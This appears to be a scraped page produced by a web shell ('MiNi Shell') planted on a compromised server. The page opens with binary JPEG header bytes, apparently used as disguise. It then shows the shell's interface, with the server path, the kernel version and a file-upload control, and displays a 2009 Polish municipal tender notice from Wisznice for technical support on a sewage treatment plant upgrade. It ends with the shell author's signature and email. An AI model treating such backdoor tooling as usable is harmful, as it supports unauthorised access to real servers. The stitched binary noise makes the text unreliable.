JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37690-N-2009.html

<p class="kh_header"><b>Wisznice: Usługi wsparcia technicznego i doradztwa przy realizacji inwestycji pn. Rozbudowa i modernizacja gminnej oczyszczalni ścieków</b><br>
<b>Numer ogłoszenia: 37690 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wisznice , ul. Rynek 35, 21-580 Wisznice, woj. lubelskie, tel. 083 3782102, faks 083 3782039.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi wsparcia technicznego i doradztwa przy realizacji inwestycji pn. Rozbudowa i modernizacja gminnej oczyszczalni ścieków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:

1.	niezależną ocenę specyfikacji technicznej jako załącznika do dokumentów 
        przetargowych obejmujących modernizację i rozbudowę oczyszczalni ścieków, 
2.	wsparcie techniczne podczas realizacji inwestycji, 
3.	udział w rozruchu technologicznym zmodernizowanej oczyszczalni ścieków,
4.	ocena działania zmodernizowanej oczyszczalni ścieków, 
5.	przygotowanie wytycznych dotyczących eksploatacji oczyszczalni oraz 
        optymalizacji procesów oczyszczania ścieków,
6.	przeszkolenie personelu technicznego zmodernizowanej oczyszczalni ścieków w 
        zakresie obsługi urządzeń i procesów technologicznych,
7.	uczestnictwo w odbiorze pogwarancyjnym zmodernizowanej oczyszczalni 
        ścieków..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.63.00-1, 71.31.00.00-4, 71.31.30.00-5, 90.49.20.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 8 000,- zł. (słownie: osiem tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają niżej wymienione warunki:

Warunkiem udziału w postępowaniu jest spełnianie postanowień określonych w art. 22 ust. 1 pzp, oraz nie podleganie wykluczeniu na podst. art. 24 ust. 1 i 2 pzp /Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm./, a w szczególności spełnianie następujących wymagań:
1. Posiadanie uprawnień do wykonywania działalności zgodnej z przedmiotem zamówienia,
2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym 
    i osobami zdolnymi do wykonania zamówienia (lub dysponowanie dostępem do potencjału 
    technicznego i osób zdolnych do wykonania zamówienia):
2.1. dysponowanie minimum 1 osobą zdolną do wykonania zamówienia tj. ze znajomością
       technologii oczyszczania ścieków, posiadającą wykształcenie wyższe oraz uprawnienia 
       bez ograniczeń do projektowania i kierowania robotami w specjalności instalacji    
       sanitarnych (lub uprawnienia równoznaczne wydane na podstawie obowiązujących 
       przepisów na dzień wydania uprawnień) i minimum 3-letnie doświadczenie w zakresie 
       nadzoru nad eksploatacją oczyszczalni ścieków, w tym doświadczenie w zakresie 
       biologicznego oczyszczania ścieków w reaktorach typu SBR pracujących metodą 
       wielofazowego osadu czynnego oraz zagęszczania, odwadniania i higienizacji osadu
       nadmiernego,
2.2. posiadanie międzynarodowego doświadczenia w wykonaniu usług o charakterze      
       i złożoności porównywalnej z zakresem niniejszego zamówienia tj. zrealizowanie z 
       należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o 
       udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym 
       okresie, co najmniej dwóch usług doradztwa technicznego lub co najmniej dwóch 
       kontraktów, w tym jeden kontrakt lub usługa w Polsce i jeden kontrakt lub usługa w innym 
       kraju, na:
   a) rozruch technologiczny oczyszczalni ścieków lub
   b) optymalizację procesów technologicznych oczyszczalni ścieków,
      przy czym przepustowość oczyszczalni, o której mowa w punktach a i b, nie może być 
      mniejsza niż 200  m3/dobę.
3. Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia:
3.1. posiadanie środków finansowych lub zdolności kredytowej na kwotę co najmniej 
       300.000,00 zł,
3.2. dysponowanie ubezpieczeniem od odpowiedzialności cywilnej (OC) w zakresie  
       prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100.000,00 zł, 
 4. Nie podleganie wykluczeniu na podst. art. 24 ust. 1 i 2 pzp.
Ocena spełnienia warunków dokonana zostanie w oparciu o dokumenty i oświadczenia złożone w celu udokumentowania spełnienia powyższych warunków, wg formuły <spełnia - nie spełnia>.

W przypadku gdy liczba złożonych wniosków o dopuszczenie do udziału w przetargu będzie większa niż 5, Zamawiający zaprosi do złożenia ofert pięciu Wykonawców, którzy otrzymają najwyższą ocenę spełniania warunków udziału w postępowaniu wg następujących zasad:

- każda kolejna usługa lub kontrakt ponad wymagane minimum, zrealizowane w Polsce,   
   określone w pkt. 2.2 - 5 pkt.
- każda kolejna usługa lub kontrakt ponad wymagane minimum, zrealizowane w innym kraju,  
   określone w pkt. 2.2 - 10 pkt.
- każde kolejne 200.000 zł zdolności kredytowej lub środków na rachunku bankowym lub    
  spółdzielczej kasy oszczędnościowo-kredytowej - 1 pkt.,
- każde kolejne 100.000 zł wartości polisy OC - 1 pkt..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty wymagane od wykonawców w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
I.

1. Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie 
    zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień 
    publicznych (tekst jednolity) /Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm./. 
2. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego     
    oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
    Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem
    podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub 
    zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
    raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
    - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
    lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 
    miesięcy przed upływem terminu składania ofert.
4. Oświadczenie Wykonawcy o spełnianiu formalnych i merytorycznych warunków udziału 
    w postępowaniu o udzielenie zamówienia, określone w art. 22 ust. 1 pkt 1-3 ustawy Pzp,
5. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą 
    uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
    zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a 
    także zakresu wykonywanych przez nich czynności. Do wykazu należy dołączyć pisemne 
    zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
    zamówienia jeżeli zaistnieje taka sytuacja.
6. Udokumentowanie wiedzy i kwalifikacji zawodowych osób odpowiedzialnych za 
    realizację zamówienia tj. załączenie CV, kopii dyplomu ukończenia studiów wyższych oraz 
    dokumentów potwierdzających posiadane kwalifikacje (uprawnienia bez ograniczeń w 
    specjalności instalacyjnej do projektowania i kierowania robotami w zakresie instalacji 
    sanitarnych) oraz doświadczenie w zakresie nadzoru nad eksploatacją oczyszczalni ścieków, 
    w tym doświadczenie w zakresie biologicznego oczyszczania ścieków w reaktorach typu 
    SBR. 
7. Wykaz wykonanych (zarówno w Polsce jak i w innych krajach) w okresie ostatnich 3 
    lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
    krótszy - w tym okresie, wszystkich usług doradztwa technicznego lub/i wszystkich 
    kontraktów na:
a) rozruch technologiczny oczyszczalni ścieków lub
b) optymalizację procesów technologicznych oczyszczalni ścieków
    przy czym przepustowość oczyszczalni o której mowa w punktach a i b nie może być  
    mniejsza niż 200 m3/dobę. 
    Wykaz powinien zawierać następujące dane: pełna nazwa i adres zamawiającego, nazwa i 
    adres wykonawcy, krótki opis przedmiotu zamówienia oraz cenę zamówienia, termin 
    zrealizowania zamówienia, oraz dołączoną opinię zamawiającego o wykonanym 
    przedmiocie zamówienia.
8. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym
    wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
    finansowych lub zdolność kredytową wykonawcy na kwotę co najmniej 300 000 zł, 
    wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
9. Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
    ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności     
    gospodarczej na łączną kwotę nie mniejszą niż kwota 100 000 zł.

II.

1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:  
 1/ dokumenty wymagane w pkt. I.2. i I.3. winien złożyć każdy członek konsorcjum,
 2/ oświadczenie z pkt. I.1. powinien złożyć każdy z członków konsorcjum lub łącznie 
     wszyscy członkowie,
 3/ pozostałe wymagane dokumenty winny być złożone wspólnie przez wykonawców.  

2. Jeżeli wniosek składa Konsorcjum firm należy do niej dołączyć list intencyjny
    Konsorcjum.

3. Zamawiający bezwzględnie wymaga, aby list intencyjny Konsorcjum:
 1/ upoważniał jednego z członków Konsorcjum (głównego partnera) jako osobę prawną
     i reprezentującą wskazaną osobę fizyczną do występowania w imieniu każdego z  
     pozostałych partnerów Konsorcjum we wszystkich sprawach związanych z wnioskiem, 
     ofertą oraz umową, 
 2/ stwierdzał, że partnerzy Konsorcjum będą odpowiadać solidarnie za całość podjętych 
     zobowiązań w ramach realizacji zadania -/zostanie zawarta umowa Konsorcjum na czas 
     trwania kontraktu. 
3. W przypadku, gdy Wykonawca uczestniczy w więcej niż w jednym wniosku, za wyjątkiem 
    podwykonawców, wnioski takiego wykonawcy zostaną odrzucone.

III.

1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: w punkcie I.2. i I.3. - 
    składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
    zamieszkania, potwierdzające odpowiednio, że:
 1/ nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 
     miesięcy przed upływem terminu składania wniosku),
 2/ nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i 
     zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
     rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
     właściwego organu (wystawiony nie wcześniej niż 3 miesiące przed upływem terminu 
     składania wniosku),
 3/ nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej 
     niż 6 miesięcy przed upływem terminu składania wniosku).
2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub 
    miejsce zamieszkania, nie wydaje się powyższych dokumentów, zastępuje się je 
    dokumentem zawierającymi oświadczenie złożone przed notariuszem, właściwym organem 
    sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
    odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub 
    miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia przekazana zostanie Wykonawcom wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2009 godzina 11:00, miejsce: Urząd Gminy Wisznice, ul. Rynek 35, 21 -580 Wisznice, pok. nr 208.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com